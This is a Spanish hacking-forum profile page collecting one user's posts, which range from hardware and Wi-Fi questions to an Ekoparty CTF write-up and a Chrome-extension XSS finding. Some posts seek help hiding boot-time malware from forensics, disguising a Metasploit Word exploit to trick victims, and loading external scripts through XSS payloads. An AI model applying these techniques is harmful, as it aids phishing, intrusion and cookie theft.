Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Ethicalsk

#1
Buenas a todos! Estamos armando un equipo en el que forma parte gente interesada en ciberseguridad. Contamos por ahora con 144 miembros en Telegram, de los cuáles la mayoría se unió luego de leer nuestra publicación en el subreddit Argentina. La gente que se unió tiene experiencia en IT, programación, redes, sistemas operativos, electrónica, distintas ramas de infosec, etc, y nos sorprenden contando sobre la pobre seguridad que hay en las empresas en las que trabajan. La idea del grupo es compartir conocimientos, novedades, consultar dudas, ayudar a los iniciados en la materia, proponer proyectos para realizar en conjunto y también reirnos un poco! Contamos con un repositorio de github con distintas guías, artículos, libros y herramientas para usar, y otras dos plataformas en las que nos manejamos (Telegram y Slack). La idea es reunir gente de todos los países de habla hispana para que sea cada vez más el conocimiento que nos compartimos mutuamente! Tenemos como proyecto realizar una página propia de wargames, que serían desafíos de ciberseguridad basados en vulnerabilidades y técnicas empleadas para encontrar fallas de seguridad en sistemas/redes en la vida real. Somos una comunidad de gente ÉTICA, que busca aprender y emplear los conocimientos para bien, es decir, para ayudar a reforzar la seguridad de redes y sistemas, en lugar de tomar provecho de las debilidades en las mismas.
Aquí comparto los links de las dos plataformas que manejamos, para los que estén interesados en formar parte del equipo!

-Telegram:

http s://t.me/joinchat/C9gER0XXGUg5TH1sLGPDeg

-Slack:

http s://join.slack.com/t/hispanosec/shared_invite/enQtNzMwOTM2OTc1ODc2LTI2MmQ1ODdjMmY5ZjZkYTQxYWUxODA0OGQzNDk1Y2ZiNTgxNTQyYjlmMDI4ODlkOGI1NmQxYzc4ZTM0YTJhMDY

Pueden sentirse como en su casa! Y nos harían un gran favor invitando a conocidos o amigos interesados en el mismo campo! Ya lo tenemos a stringManolo, un notable integrante de de ésta comunidad.

Agradezco enormemente a la gente que quiera formar parte de ésto, y pido disculpas si cometí alguna clase de infracción al realizar éste post.

Importante: dejé un espacio en los links entre el "http s" para que los links no sean de acceso directo y no violar las normas del foro, asi que deberían eliminar el espacio para poder unirse a los grupos. Por otra parte en nuestra comunidad recomendamos enormemente utilizar éste foro, y el warzone que tienen. La idea de nuestra comunidad es más para interactuar en tiempo real, y plantear proyectos para realizar entre todos a través de Slack que tenemos vinculado a Github. Cuando surjan aportes importantes en nuestra comunidad, pensamos incluirlos en éste foro, asi la información está disponible para todos, tanto para ésta comunidad, como para la nuestra.
#2
Hacking Wireless / Dudas sobre TP-LINK CPE220
15 Noviembre 2018, 16:50 PM
Buenas que tal! En primer lugar quería preguntar que opinan del producto:

https://www.tp-link.com/ar/products/details/cat-37_CPE220.html

En segundo lugar, hay algo que no me cierra. El access point es direccional, si lo uso en modo repetidor, lo voy a apuntar en dirección al AP/router al que quiero repetir... Pero... Los clientes que se conecten al repetidor también deberían estar dentro del angulo de cobertura del AP? Como es direccional... Que pasa si un cliente del repetidor se encontrara justo en la parte de atrás a la dirección que apunta (sentido contrario digamos), el cliente no se podría conectar?

En tercer lugar, quería preguntar si puede funcionar bien en interior a pesar de que esté hecho especialmente para exterior. En caso de que lo quiera usar para repetir un AP que esté cerca pero con una pared entre medio.
#3
Buenas! Qué tal? Mi duda es la siguiente. Algunos sitios con wordpress están configurados para no mostrar la versión en los headers ni en ningún lado. Quería saber si existe un script que se base en huellas e infiera la posible versión haciendo algunas peticiones, o bien saber como se supone que se debe proceder para probar la seguridad de un sitio con Wordpress cuya versión no está expuesta... Muchas gracias desde ya.
#4
Hardware / Upgrade a notebook de hace 10 años
1 Noviembre 2018, 16:30 PM
Buenas que tal! Tengo un primo que tiene una notebook de hace 10 años con Windows Vista y me dice que le anda muy lenta, y si la podría formatear e instalar Windows XP. Yo le dije que Win XP ya está obsoleto, y que va a tener problemas con drivers, con navegadores, que va a ser todo más complicado. Le convendría instalar Windows 7 y hacer algunos cambios en el hardware... El problema principal está en que solo tiene 1GB de RAM. Yo pensabe comprarle otra SO-DIMM DDR2 de 2GB para añadirla al slot que le queda disponible, pero también le propuse la idea de cambiar el disco rígido por uno de estado sólido, para mejorarla un poquito más... Si el día de mañana la notebook le deja de servir, igual el disco SSD va a seguir sirviendo para otra PC. Bueno... Les muestro las características de hardware del PC:



como ven, es una Compaq Presario C700

viendo éste video:

[youtube=640,360]https://www.youtube.com/watch?v=dxh7EhqZUWw]https://www.youtube.com/watch?v=dxh7EhqZUWw[/youtube]

noté que evidentemente tiene otro slot de RAM sin usar, asi que si le compro ésta memoria:



podría tener 3Gb de RAM en total, y supongo que con eso le va a alcanzar, el procesador que tiene safa para lo que el la quiere usar. Hay que pensar que el le da un uso más bien de oficina, para dar clases, abrir programas de office, o navegar y nada más que eso.

Y luego, como complemento, le dije que no es fundamental, pero si le cambiamos el disco rígido de 120gb que tiene, por un SSD de 240gb, además de tener más espacio, también notaría una mejora en el rendimiento, y el día de mañana podría usar el SSD en otra PC si quiere descartar la notebook...

Bueno, quería saber si éste SSD: (7mm de grosor)



puede ser compatible con las medidas y las características de la notebook que les acabo de mencioanr, y si están de acuerdo con mis decisiones. En resumen lo que pienso hacer es:

-Añadir 2Gb de RAM
-Reemplazar el disco rígido de 120gb por el SSD de 240gb
-Instalar Windows 7 de 64 bits en el SSD

Muchas gracias desde ya por sus opiniones! Por más que tenga más o menos decidido lo que voy a hacer, siempre me gusta consultarlo con otra gente del rubro, ya que todos saben algo que uno no, y por ahí me pueden hacer alguna pequeña recomendación. De todas formas, las compras que habría que hacer son bastante económicas a comparación de comprar una notebook nueva, que no sería necesario dado el uso que mi primo le va a dar.

Saludos!
#5
Buenas! Quería discutir éste tema con ustedes. Hace algunos meses quise hacer una cuenta con otra identidad, no con la intención de molestar a nadie, sino por motivos de privacidad. Antes era muy sencillo crear cuentas con la identidad que uno quisiera, pero ahora google, microsoft, y las empresas grandes necesitan que cada cuenta esté asociada a un número de celular e introducir el código que nos mandan por SMS para activarla. Hay servicios en internet, que publican varios números de teléfono, y suben los SMS que les llegan, para poder usar ese número al registrarse, y que el código de verificación llegue a la página para poder activar la cuenta, pero como con cada número solo se puede crear una cuenta, éste servicio nunca me dio resultado, ya que seguramente otra persona antes que yo uso el número para crear una cuenta de google, microsoft, etc. Entonces la única alternativa que estoy viendo es la de comprar un chip por cada cuenta que uno se quiera hacer, y utilizar el chip solo para recibir e introducir el código de activación... Quería saber si alguno creo cuentas secundarias o cuentas "fake" recientemente, y si tuvo que comprarse un chip para poder hacerlo, o si lo logró hacer de otro modo.

Muchas gracias desde ya!

Saludos.

Aclaración: se que hay gente que se hace cuentas falsas con la intención de engañar y lastimar a la gente, y me parece completamente malo, pero también hay gente que prefiere tener cuentas con otras identidades por motivos de privacidad (para desvincular las acciones que haga una misma persona en una sola cuenta), o bien para poder tener más espacio en la nube de google para almacenar cosas una vez que se llena la cuenta principal. Tal vez me digan que está mal querer ocupar más espacio en la nube del que google me da, pero con lo grande que es google, y con toda la información y poder que tiene injustamente sobre sus usuarios, me parece que no esta mal querer almacenar un poco mas de GBs de los que ellos permitirían.
#6
Buenas! Se que ésto no es un foro de astronomia, pero igual se que a muchos de ustedes les interesan éstos temas. Divagando, me surgió una duda... Los astronautas al salir de la atmósfera de la Tierra, experimentan la ingravidez, y lo perciben como si flotaran, ya que están fuera de la zona gravitatoria terrestre... Mi duda es... Lo más lógico me parece que al salir de la zona gravitatoria de la Tierra, el astronauta se vea atraído por la fuerza gravitatoria del sol en forma directa... Por qué el astronauta no sentiría que se está cayendo al sol, en lugar de sentir que está flotando? O precisamente, se encuentra cayendo al sol, pero con una fuerza de atracción muy leve casi imperseptible?

Gracias desde ya!
#7
Muy buenas a todos! Les voy a comentar mi problema. Tengo una PC (un poco vieja), que solo uso para descargar pdf, leer word, usar facebook y escuchar musica. Tiene un AMD Athlon X2 de procesador.

Luego de mucho tiempo de no hacerle un mantenimiento, saqué toda la mugre que tenía, limpié bien los ventiladores, extraje y limpie bien el disipador, y cambie la pasta termica del procesador... En un principio le aplique grasa siliconada (la blanca). Luego de unas semanas, en días calurosos, o cuando esta prendido el horno en casa (ojo, el horno no esta tan cerca de la pc, pero igual el calor llega a toda la casa) se volvía a apagar sola... Lo primero que que pensé era que la grasa siliconada era de mala calidad, entonces averigué que existe una pasta termina metálica (o con partículas metálicas) de color gris, que conduce el calor más efectivamente. Asi que compré esa pasta, quité la anterior, y apliqué la nueva. Pero a los pocos días volvía a pasar lo mismo...

Luego descargué el Speed Fan, y tomé algunos números. La temperatura mínima que tuve fue de 24°C más o menos, y luego va subiendo a los 40°C, a los 50°C, y luego, mientras corría el malwarebytes (para descartar que fuera por algún virus), la CPU empezó a trabajar al 100%, y la temperatura empezaba a subir, llegaba a los 60°C, e iba subiendo de a poco, hasta llegar a ver 69°C (durante todo ésto, abri varias pestañas de chrome, para potenciar el uso, y chequear la temperatura]), y luego de repente se apaga... El BIOS está configurado para que se apague cuando llega a los 70°C. Entonces supongo que no hay ningún malware que me esté apagando el equipo, es merametne cuestión de la temperatura. Además justo coincide que sucede cuando hay calor en casa...

Quería que me dijeran como poder resolver éste problema, ya que el mantenimiento, se lo hice, y supongo que lo hice bien... Tampoco es tanta ciencia que digamos limpiar todo, y aplicar la pasta termica...

Se me ocurre cambiar la temperatura máxima en la que la PC se apaga, a 80°C, aunque no me convence, ya que supongo que la vida util de la PC se reduciría... Alguien con alguna idea?

Muchas gracias desde ya!
#8
Seguridad / Cifrar malware
31 Julio 2018, 13:55 PM
Muy buenas! Quería saber de forma general, como se puede cifrar malware que se ejecuta en el arranque del sistema. Lo que me hace ruido en éste tema, es que si yo cifro el malware que quiero que se ejecute en el arranque, en el arranque se debería descifrar, y sin que yo le introduzca la clave necesaria para descifrar, es decir, debería descrifrarse automáticamente, lo cuál me hace pensar que la clave para descifrarlo debería estar almacenada en el mismo ordenador infectado y que entonces un forense podría descifrar facilmente el malware, ya que la clave para descrifrarlo está en el mismo ordenador.

Me gustaría que me corrijan si me estoy equivocando en éste pensamiento, y saber si existe alguna forma para que un malware se descifre y corra automáticamente en el arranque, evitando que la clave de descifrado sea facil de acceder, ya que sino el hecho de cifrar no serviría de nada...

Gracias desde ya. Saludos
#9
Seguridad / Malware indetectable en mi PC
20 Febrero 2018, 21:26 PM
Buenas! Les comento mi situación, hace unos días el Chrome me empezó a andar extraño, cada vez que cargaba una página me salía un cartel de Err:Empty response, y tenía que esperar unos segundos más para que la página cargara. Actualmente la primera vez que quiero abrir X página se cuelga, no carga jamás y tengo que volver a enviar otra petición con F5 para que empiece a cargar... Si no vuelvo a mandar la petición no carga nunca. Luego probé abriendo el Wireshark para analizar el tráfico y si mal no recuerdo, al buscar algo en Chrome se me empezaba a llenar de paquetes QUIC, y las ultimas veces que probé con Wireshark directamente dejaba de responder. Viendo la ventana de procesos, Wireshark iba utilizando como 20Mb de memoria más por cada segundo que pasaba, llegando al poco tiempo a utilizar 2Gb de RAM... Supongo, no estoy seguro ya que no tengo mucha experiencia en malware, que me están usando el navegador para minar criptomonedas. Luego probé analizar todo el equipo con el Bitdefender Free (antivirus que tengo instalado) y no detectó nada. Finalmente probé descargando el Malwarebytes y luego de instalarlo, cuando lo queiro ejecutar, me salta un cartel que dice: Unable to connect to the Service.

Querría saber dos cosas, en primer lugar, me gustaría saber si los sintomas que les describo son sintomas indudables de malware o puede haber otro problema distinto en mi sistema que no tenga que ver con malware? Y en segundo lugar, como procederían o que seguirían haciendo ustedes para que todo vuelva a la normalidad? Evitando en lo posible formatear.

Saludos!

#10
Seguridad / DoS en aplicaciones web
5 Diciembre 2017, 18:54 PM
Buenas, vengo de leer la parte que explican los ataques posibles de DoS que se pueden hacer en una app web debido a vulnerabilidades en el código en la guía de OWASP del 2008. Por ejemplo, si al entrar una excepción no se cierran los archivos, se podría llenar la memoria del servidor, si se usa un número en un for que uno le manda como parámetro, podría forzar a dar muchos ciclos para saturar al CPU, asi como las wildcards de SQL, para forzar al DBMS que utilice mucho CPU buscando nuestra consulta, o llenar al disco de logs, etc... Recién bajé la guía del 2014 y ésta sección de pruebas ya no está incluída... Por qué será? Los ataques que mencione siguen siendo posibles hoy en dia? Tal vez el de los wildcards por ejemplo se me ocurre a mi que los DBMS fueron cambiando la configuración por defecto, o algo para evitar que ésto pase independientemente de lo que filtre la app web... Que piensan? Todo ésto es información del 2008, me gustaría saber si en 2017 estas pruebas siguen teniendose en cuenta. Saludos!
#11
Muy buenas! Quería mostrarles un pequeño fallo que encontré con ayuda del administrador de brutelogic.com.br . El tipo es un genio del XSS, encontró XSS en casi todas las páginas de empresas de antivirus, en facebook, en amazon y otras empresas de las más grandes, y además por lo poco que llegué a hablar con él parece ser una excelente persona porque yo siendo un novato del tema, me respondió por twitter enseguida, y me dio una mano todo el tiempo, ademas de hablarme con mucha humildad. Si les interesa el hacking web les recomendaría leer sus artículos, yo estoy terminando de leerlos y explica técnicas y conceptos muy buenos para hacer XSS.

Bueno, empecemos con la historia. Resulta que estaba probando si se podía ejecutar javascript a través del bot de telegram, enviando el mensaje sendMessage con el parámetro --parse-html que parsea el html de lo que uno le manda en --text. Según decía la documentación solo se podían mandar tags del tipo <b>, <pre>, entre otros, y al mismo tiempo convertía a html entities la mayoría de caracteres especiales. Probe algo como <b onclick=alert>clickear aqui</b> y se llegó a mandar, pero si abría un paréntesis, para lograr el alert(1), o ejecutar cualquier otra función, no lo mandaba. Entonces googlie: "javascript without parentheses" y me encontré con ésto:



No lo podía creer!!! A simple vista me pareció que google no estaba filtrando bien el contenido que indexaba, y que el payload XSS de alguna página de hacking se llegaba a ejecutar. Pero era demasiado raro para ser cierto... Probé buscar varias veces "javascript without parentheses" a través Chrome v62 con mi pc de escritorio y siempre me saltaba el alert(1). Haciéndolo desde firefox no pasaba, y desde Chrome v62 de mi portatil tampoco pasaba, ni del Chrome del celular... Luego probé borrando las cookies del Chrome de mi pc de escritorio (en el único navegador que pasaba), y seguía pasandome aún sin las cookies... No entendía el por qué. Entonces me comuniqué a través de Twitter con el administrador de brutelogic.com.br, y me pidió que buscara alert(1) en el DOM... Yo antes lo había buscado en el source y parecía estar bien filtrado, pero no tuve en cuenta las modificaciones que javascript puede hacer en el DOM... Resulta que el alert provenía de su mismisima cheat sheet de XSS!!! Pero solo en el navegador de mi pc de escritorio podía ver todo el tag del script coloreado (script funcional) dentro del DOM, en los demás navegadores (incluyendo el navegador de éste tipo) solo se veía negro, como texto, como si no se estuviera ejecutando... Ahi les muestro una comparativa. A la izquierda está el DOM del navegador con el que salta el alert y a la derecha el navegador de brute y el Chrome de mi notebook:



También pueden ver como se deforma el contenido de la página de Brute, ya que en ese espacio en blanco estaría habiendo una caja que creó el tag <svg>. Hasta ahora sabíamos de donde provenía pero no que lo generaba. Entonces me dio la idea de revisar las extensiones de mi navegador...

Y ahí estaba el problema. Probé deshabilitandolas a todas y ahí dejó de saltarme el alert. Luego probé activando una por una para encontrar cuál era la culpable. Resultó ser gInfinity 2.4.1, una extensión con muy pocos usuarios que sirve para mostrar las páginas sucesivas de los resultados de Chrome una debajo de otra sin tener que clickear el boton 2,3,4,5, etc para cambiar de página. Aca su enlace para el que quiera chusmearla:

https://chrome.google.com/webstore/detail/ginfinity/dgomfdmdnjbnfhodggijhpbmkgfabcmn

Luego me aconcejó que revisara el código fuente para darme cuenta del fallo, y busqué la ubicación donde están las extensiones, y resulta que constaba de 3 archivos javascript:

options.js,  gInfinity.js, background.js

Primero revisé gInifinity.js, comentando de a partes hasta que dejara de saltarme el alert, luego terminé ubicando la parte del código que generaba problemas. Estaba agregando un <span> al DOM, cuyo contenido era parte del DOM original pero ésta vez sin estar encodeado! Toda la extensión en si modifica el DOM en exceso, y luego terminan pasando cosas como éstas... Aca les muestro la sección de código que genera problemas. Comentando la línea remarcada en rojo, el error no ocurre:




El ataque que se podría hacer aprovechando ésto es lograr que el javascript que queramos que se ejecute en los usuarios de la extensión, se logre indexar dentro del contenido de google.com, para que se ejecute al buscarlo y lograr obtener cookies de google.com, redireccionar, enganchar con beef, o cualquier otra técnica de XSS que se nos ocurra... Lo mas jugoso obviamente son las cookies, pero habría que ver bien cuales están protegidas por HttpOnly, y demás para determinar que es lo más dañino que se pueda llegar a hacer...

De todas formas la extensión es usada por 7,608 usuarios, lo que significa que no es una vulnerabilidad crítica. Es una vulnerabilidad bastante pequeña, pero es curiosa y poco usual, por lo menos para lo que yo estoy acostumbrado a ver. Y esta bueno ver como uno empieza haciendo algo y termina encontrando otra cosa que nunca hubiera esperado y aprendiendo cosas en el camino. Antes de ésto no tenía ni idea de lo que era una extensión de Chrome ni como funcionaba por ejemplo :p

Asi que bueno, espero que les haya gustado la historia, como les dije no es una falla importante pero está bueno para ver como las vulnerabilidades pueden estar en todos lados y hasta toparnos con ellas accidentalmente...

Saludos!
#12
Buenas, les comento mi situación. Estaba usando Kali en VM, al principio solo le di 1 cpu y 2gb de ram. Quería experimentar con el OpenVAS ya que nunca había probado tal scanner, y luego de configurarlo bien, lo empecé a usar, y a los dos dias, el Linux se me colgó y no me quedó alternativa que apagarla de forma forzada sin cerrar los servicios abiertos ni nada. Luego cuando la prendo empiezo a tener miles de problemas distintos con el OpenVAS que no pude solucionar. Luego de googlear y abrir 500 pagians y de revisar todos los archivos de logs, de ver cada archivo correspondiente a OpenVAS en mi FS, no pude encontrar una solución, y tuve una de las mayores frustraciones de mi vida. Después en un momento cuando se suspende Linux, y me pide la contraseña del usuario pongo mi contraseña y no me debaja entrar, me devolvía el mensaje de error de que las credenciales eran incorrectas. Luego sin haberlo solucionado, vuelvo a apagar la VM de forma forzada y cuando la quería encender nuevamente no me iniciaban los servicios:

failed to start network time syncronization
failed to start raise network interfaces
failed to start login service

entre otros, y se quedaba colgada en el boot. Asi que me cansé, copie todo lo importante que tenía en el .vdi a travéz del 7zip y ahora que reinstale el Kali, todo vuelve a funcionar bien...

Quería saber si a ustedes les pasó algo como ésto alguna vez, o si piensan que es posible que ésto pase. Porque no estoy 100% seguro de que el apagado forzado sea el motivo de éstas fallas.

Saludos y gracias!

#13
Seguridad / Utilidad del salt
13 Noviembre 2017, 08:01 AM
Buenas, tengo dudas respecto a la utilidad de usar salt junto con la contraseña antes de enviar al cipher. Según leí los caracteres aleatorios que se concatenan al password sirven para aumentar la longitud final y hacer que sea mas dificil realziar ataques de fuerza bruta o con tablas rainbow. ya que si la cotnraseña es de 8 caracteres por ejemplo y el salt de 8, entonces el string final que el atacante tendría que atacar sería de 16 caracteres. Ésto solo tendría sentido según mi, si el hash no se almacenara en la misma base de datos, ya que por ejemplo en joomla el salt se almacena junto con el hash del password con ":" de separador. No entiendo la utilidad del salt en éstos casos ya que el atacante con un script puede concatenar las contraseñas del diccionario con el salt antes de pasarlo por el cipher, y sería lo mismo... Espero que me corrijan ya que seguramente hay algo que no estoy teniendo en cuenta o tal vez esté equivocado.

Saludos!
#14
Seguridad / PHP Object Injection a ciegas?
6 Noviembre 2017, 11:22 AM
Buenas! Estuve leyendo sobre los problemas que traia unzerializar datos que provienen del usuario en php, ya que  se podría mandar un objeto serializado con la intención de que se ejecuten automáticamente los métodos mágicos definidos para el objeto creado, y si dentro de los métodos mágicos existe otro tipo de vulnerabilidad como sql injection, code execution, rfi, etc, podrían ser triggereados gracias a éste objeto serializado que se le manda.

Estuve practicando con algunos ejercicios pero siempre con el código fuente a la vista. Ustedes creen que es posible aprovechar éste tipo de vulenrabilidad a ciegas? Es decir, sin tener acceso al código fuente? Según mi conclusión éste tipo de cosas solo se puede explotar bien en CMSs (como Joomla!), ya que el código es accesible, o si ocurren cosas especiales como que haya copias de respaldo en texto plano de las paginas del servidor en cuestion, pero sin el fuente lo imagino imposible, ustedes que piensan?

Saludos
#15
Foro Libre / Sobre artículos en wikipedia
3 Noviembre 2017, 15:20 PM
Buenas! El capítulo 5 de la primera temporada de Mr. Robot muestra la idea de lo útil que puede ser tener un artículo de wikipedia para un ataque de ingeniería social. No se muy bien como se maneja la puntuación o reputación de cada wikipedista en la vida real, según en la serie el que hizo el artículo ya era wikipedista de antes con mucha reputación y por eso no le borraron el artículo. Yo hace un tiempo le había hecho un artículo a un amigo para su cumpleaños y duró 30 minutos hasta que lo quitaran... Además no entiendo exactamente que requisitos hay que cumplir para poder estar en wikipedia... Si agrego información falsa y pongo referencias falsas que validen lo que estoy escribiendo puede llegar a quedarse el artículo? O hay algo asi como una whitelist de referencias confiables? Muchas gracias.
#16
Buenas! Los que sepan de PHP saben que session_regenerate_id() sirve para cambiar el ID de la sesión. Quería saber que opinaban del hecho de regenerar la sesión por cada cosa que hago, es decir por cada petición que mando. Si voy a login que cambie el id, si voy al panel de buscar usuarios, que se cambie el id, si voy a alguna funcion para listar algo, que se cambie, si voy a mi perfil, que se cambie... Qué opinan de hacer esto? Para mi es muy útil para mitigar robos de la cookie de sesión mediante sniffing cuando no usamos https... Pero tal vez hacer las cosas de éste modo tenga puntos en contra que no esté considerando.

Saludos!
#17
Nivel Web / Es posible bypassear ésto?
31 Octubre 2017, 21:01 PM
Buenas, quería saber si de alguna forma se puede concretar un XSS en éste caso... En el campo de búsqueda introduzco:

dfgsdfg" onload=alert(1);

y en el fuente sale:

Código (html) [Seleccionar]
<input id="searchInput" type="text" value="dfgsdfg&quot; onload=alert(1);" placeholder="Buscar..." maxlength="100" name="search"

como vemos convierte a html entities los " y me impide escaparme del atributo...

Ésto me parece imposible de bypassear y con el tag value no podría ejecutar script mandando javascript:alert(1)... Se les acurre alguna forma? Gracias y saludos!
#18
Muy buenas! Hace 3 días subieron un nuevo método para atacar a través de Word que según dice evita las advertencias de seguridad:

https://null-byte.wonderhowto.com/how-to/execute-code-microsoft-word-document-without-security-warnings-0180495/

pero no me parece tan bueno ya que el usuario tiene que aceptar dos ventanitas, y la segunda te pregunta si queres abrir un ejecutable, y me parece que hay que ser muy tonto para darle que si a ese cartel... Yo todavía me sigo quedando con el ataque anterior:

https://www.rapid7.com/db/modules/exploit/windows/fileformat/office_word_hta

con éste si lo abre y está desbloquedo, te metes casi instantaneamente, y si cerras el word no perdes la conexión, ya que la conexión está en otro proceso,  el punto en contra es que si lo descargas siempre aparece como bloqueado y te sale una notificacion que te dice que si no lo vas a editar que no lo desbloquees, pero que si vas a editar si. Entonces pensé en hacer que el archivo de word sea un formulario para descargar, completar y enviar, cosa que obligue a la victima a deslbloquearlo si quiere editar. El asunto es que el word que genera el metasploit esta todo en blanco con un cuadradito en el medio, y me gustaría poder agregar texto (un formulario) antes de que aparezca ese cuadradito. Pero no pude, traté de agregar texto y al agregarlo el exploit deja de funcionar. Tienen idea de cómo poder editar la apariencia del word que genera metasploit?

Saludos y gracias!
#19
Buenas! la forma que conozco para agregar un script de otra página es:

Código (javascript) [Seleccionar]
<script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código (javascript) [Seleccionar]
javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código (javascript) [Seleccionar]
javascript:src="www.web.com/script.js"

tampoco funcionó:

Código (javascript) [Seleccionar]
javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!
#20
Muy buenas a todos! Los últimos 3 días se celebró la Eko Party en Buenos Aires (Argentina). Fue mi primera Eko, y la gané en un sorteo que hizo un grupo de estudiantes de mi facultad. El jueves (dia del medio), fue mi cumple, asi que lo pase muy bien! El único problema es que dormí 2 horas casi todas las noches, xq tengo el sueño cambiado y problemas de insomnio hace mucho, y cuando me tengo que levantar temprano estoy todo el día re cansado y no rindo al 100.

Les quería comentar sobre un desafío que se hizo en el que tenías que asociarte a una red wifi para luego pwnear el router (avancé muy poco). Si alguno que me lee pudo avanzar más que yo, me gustaría que comentara que probó, que averiguó y que consiguió.

Resumen sobre el desafío: (lo poco que avancé)

Había que meterse a una red con SSID: EkospaceLab, con WPA PSK sin WPS.
Había un beacon flood que lanzaba muchos beacon con distintos SSID en el aire (más de 100). Algunos de los SSID estaban en base64, uno de los SSID en base64 decodeados era la clave de EkospaceLab. Una vez adentro te encontrás en una red con IPv4 desabilitado, teniendo la posibilidad de comunicarte solo a través de IPv6. Luego de escanear el router se observan 3 puertos evidentemente protegidos con tcpwrapper. Escaneo:


Ethical@Sk$ nmap -6 fe80::fad1:11ff:fe9f:f9b2 -sV
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-29 14:31 -03
Nmap scan report for fe80::fad1:11ff:fe9f:f9b2
Host is up (0.0030s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
53/tcp open  tcpwrapped
80/tcp open  tcpwrapped
MAC Address: F8:D1:11:9F:F9:B2 (Tp-link Technologies)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.60 seconds


Llegué hasta ahí porque no me quería perder muchas charlas. Pero quedaba todo lo más pesado, bypassear tcpwrapped y ver como comunicarse con los puertos hasta encontrar el punto debil o lograr controlar el AP.


Mi experiencia con el desafío:

El primer día el organizador del desafío me había dicho que había una red oculta a la que me tenía que meter y que había otras redes que me podían dar la información para asociarme. Como el primer día no llevé la notebook, a la noche cuando volví a mi casa me puse a repasar sobre las redes con SSID oculto, y recordé que al mandar paquetes deauth para desasociar a un cliente lo obligás a mandar luego un PROBE request que incluye el SSID en texto plano. Pero como necesitaba un cliente activo yo pense que tal vez no iba a haber nadie conectado para deautenticar, asi que investigue un poco y vi que se puede hacer un ataque de diccioanrio/fuerza bruta mandando probes con SSID's distintos hasta dar con el correcto, cuando se manda un PROBE request con el SSID correcto se recibe un PROBE response. De lo contrario el AP ignora el paquete, de ésta forma podemos descubrir el SSID sin el cliente conectado. Fui al segundo día con la notebook con ésto en la cabeza, y al segundo dia la red había dejado de ser oculta y su SSID era EkospaceLab, con WPA/PSK. Supongo que para evitar conseguir el SSID tan facilmente si otro participante del desafío lograba meterse y desautenticandolo...

Lo primero que probé fue hacer un airodump de la red para ver las redes que había, luego un amigo se fijo las redes en su celular y había detectado otras que yo no. Entonces terminé llegando a la conclusión de que las redes que mi amigo podía ver eran parte de un beacon flood (posiblemente con mdk3), y también que el airodump no muestra las redes solo fijandose en los beacon frames, sino que tambien envía PROBE request a la red para verificar que exista antes de mostrarla. Le pedí a mi amigo que me fuera dictando los SSIDs que veia para agregarlos a un diccionario e intentar crackear el hash obtenido del wpa handshake. no hubo caso. Mi amigo me preguntó si había una forma para obtener todos los SSIDs con un comando desde linux. Le dije que investigara, y encontró una solución muy rápido usando iw acompañado de sed y grep hasta quedar solo la información que buscabamos (los SSIDs). Ésta vez, con todos los SSIDs y no solo los pocos que me había dictado antes, probamos crackearlos. Y nada... Después le cuento lo que intentamos a otro chico que estaba haciendo el desafío y me dice que la clave iba a estar codificada, que revisara bien los SSIDs. Con eso volví a mi notebook diciendome base64 para mis adentros. Y si, había usado al iw y guardado en un archivo todos los SSIDs para mandarlo directamente al aircrack sin haber observado todas las SSID con mis ojos. Algunos de los SSIDs estaban en base64, asi que las decodeamos y probamos las passwords decodeadas que eran ekoparty, ekolab007 creadpag548, y ekolab. Ninguna funciono, el aircrack no hayo la contraseña. El segundo día solo nos habíamos quedado un rato, asi que volvimos al tercer día. Dos amigos a la noche hicieron un script que detectara constantemente las redes con un '=' y decodearlas con la intención de poder captar algun SSID que apareciera una vez cada mucho tiempo. Luego chusmenado bien había otros SSID con el formato parecido pero sin el '=', asi que procedimos a decodearlas, y obtuvimos otras 3 palabras: martin, agente007 y ekoparty007. Con ésto aprendí que no es necesario que tenga '=' para estar en base64. Luego utilizamos el aircrack con éstas 3 palabras, y dimos con que agente007 era la clave. Luego trate de meterme con esa contraseña con el celular y al no conseguirlo, le hablé al organizador del desafío y me dijo que el AP no estaba conectado a internet, y que tenía que conectarme de una forma especial a través de linux. Probé conectandome simplemente desde la interfaz gráfica que te da los wifis y no pude conectarme. Antes de conectarme se me colgó el sistema un cachito, supongo que producto de haber tantos beacon frames en el aire. Luego intenté conectarme con la consola a través de iwconfig y no lo conseguí, me saltó un error (creo que por los drivers de la tarjeta wifi integrada). Pasó el tiempo y me puse a analizar el tráfico wifi tratando de encontrar algo, alguna ayuda... Me quede pensando "conectarme de una forma especial", y no se a que se refería el organizador... Despúes recordé que existian los servidores radius (nunca investigue como funcionan pero solo había oirdo hablar de ellos), pero al ver que era PSK, pense que sería imposible que hubiera un radius. Y asi paso el tiempo, y casi resignado, intento de vuelta con el celular, y me pongo a ver los paquetes de autenticacion, y pareciera haberse logrado autenticar perfectamente. Luego volví a insistir y tratar de conectarme a través de la interfaz gráfica de mi linux y lo logre... La verdad no entiendo por que antes no pude y después si. Perdí más de una hora, y no hubo ninguna forma especial ni nada de conectarme, y es un misterio que no pude resolver, porque habiendolo probado antes no pude y después si.

